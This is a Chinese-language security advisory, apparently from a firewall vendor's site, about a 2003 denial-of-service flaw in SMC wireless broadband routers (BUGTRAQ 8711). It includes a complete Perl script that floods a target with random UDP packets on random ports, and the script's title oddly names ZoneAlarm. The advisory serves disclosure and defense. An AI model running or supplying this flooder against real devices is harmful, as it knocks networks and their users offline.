关于冰盾 | 使用条款 | 网站地图
 
SMC Router随机UDP包远程拒绝服务攻击漏洞
SMC Router随机UDP包远程拒绝服务攻击漏洞
作者:冰盾防火墙 网站:www.bingdun.com 日期:2015-02-15
 

信息提供:

安全公告(或线索)提供热线:[email protected]

漏洞类别:

设计错误

攻击类型:

拒绝服务攻击

发布日期:

2003-09-26

更新日期:

2003-10-08

受影响系统:

SMC SMC7004VWBR 1.23
SMC SMC7004VWBR 1.22
SMC SMC7004VWBR 1.21a
SMC SMC2404WBR

安全系统:

漏洞报告人:

res076cf ([email protected]

漏洞描述:

BUGTRAQ  ID: 8711

SMC2404WBR是一款无线CABLE/DSL宽带路由器。

SMC路由器不能正确处理随机发送的UDP包端口扫描,远程攻击者可以利用这个漏洞对路由器进行拒绝服务攻击。

发送随机UDP包到路由器上的0-65000端口,可引起路由器挂起,停止对正常服务的响应。

测试方法:

警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

res076cf ([email protected])提供了如下测试方法:

#!/usr/bin/perl
use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
   &usage
}

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}

解决方法:

厂商补丁:

SMC
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.smc.com/


 

 
最新内容:
通信网中UDP协议和TCP协议的角逐[2015-02-15]
TCP、UDP及Socket的关系[2015-02-15]
传输层协议TCP和UDP[2015-02-15]
学习笔记:UDP用户数据报协议[2015-02-15]
对DDoS攻击实例之SYN Flood攻击的详细内容讲述[2015-02-15]
运用Iptables防御Syn Flood攻击[2015-02-15]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2016 冰盾防火墙  www.BingDun.com 法律声明
服务热线:(010)51661195